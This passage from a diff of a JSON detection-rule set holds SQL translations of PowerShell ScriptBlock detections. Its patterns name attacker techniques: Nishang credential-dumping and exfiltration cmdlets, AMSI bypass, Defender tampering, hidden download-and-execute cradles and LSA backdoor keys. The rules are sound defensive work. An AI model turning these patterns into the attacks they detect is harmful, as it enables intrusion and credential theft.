ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "status": "test", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Administrator script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate user creation" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_local_user.yml" + "filename": "posh_ps_enable_susp_windows_optional_feature.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "Powershell XML Execute Command", - "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "title": "Suspicious TCP Tunnel Via PowerShell Script", + "id": "bd33d2aa-497e-4651-9893-5c5364646595", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113", + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" ], - "filename": "posh_ps_xml_iex.yml" + "filename": "posh_ps_susp_proxy_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6346,425 +6239,418 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" - ], - "filename": "posh_ps_automated_collection.yml" - }, - { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", - "status": "test", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object 